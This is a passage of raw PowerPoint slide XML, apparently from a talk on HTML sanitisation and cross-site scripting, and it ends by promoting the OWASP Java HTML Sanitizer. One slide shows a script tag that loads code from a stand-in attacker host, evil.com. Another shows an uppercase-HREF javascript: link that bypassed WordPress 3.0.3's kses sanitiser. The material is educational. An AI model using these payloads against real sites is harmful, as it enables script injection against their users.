              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;p/&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="836699" y="4301120"/>
            <a:ext cx="7333829" cy="1465129"/>
            <a:chOff x="836699" y="4301120"/>
            <a:chExt cx="7333829" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6705394" y="4301120"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3868152" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="Oval 30"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3868152" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3955976" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>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r>
                  <a:rPr lang="en-US" sz="8000" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>!</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="TextBox 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="836699" y="4752650"/>
              <a:ext cx="5868695" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>The attacker can add any JS to this page!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2018178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HTML sanitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bug 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1367894"/>
            <a:ext cx="8686802" cy="1246495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="18288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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> 3.0.3 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>kses.phs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Credit: Mauro Gentile (@sneak_)… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Thx @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>superevr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Input and Output:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;a HREF="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(0)"&gt;click me&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2680083"/>
            <a:ext cx="8686802" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="18288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a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Observations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>No content modification required to trigger the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitizer: Only lower case "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>" recognized as an attribute </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser: HREF attribute recognized, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>URL executes on click</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitizer and browser don’t agree on what</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>constitutes an attribute name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="4146551"/>
            <a:ext cx="3657600" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1532256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457200"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OWASP HTML Sanitizer Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1363965"/>
            <a:ext cx="8229600" cy="372257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP_Java_HTML_Sanitizer_Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8686800" y="6103836"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2162535"/>
            <a:ext cx="8686800" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="45720" rIns="36576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solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML Sanitizer is written in Java which lets you include HTML authored by</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>third-parties in your web application while protecting against XSS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2813005"/>
            <a:ext cx="8686800" cy="584776"/>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solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>This code was written with security best practices in mind, has an extensive test suite, and has undergone adversarial security review. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3463475"/>
            <a:ext cx="8686800" cy="338554"/>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solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>code.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/p/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-java-html-sanitizer/wiki/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>AttackReviewGroundRules</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3867723"/>
            <a:ext cx="8686800" cy="338554"/>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solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Very easy to use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4290336"/>
            <a:ext cx="8686800" cy="338554"/>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solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>It allows for simple programmatic POSITIVE policy configuration. No XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4694584"/>
            <a:ext cx="8686800" cy="338554"/>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solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Actively maintained by Mike Samuel from Google's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> team! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5098832"/>
            <a:ext cx="8686800" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="45720" rIns="45720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solidFill>
                  <a:schemeClr val="tx1">
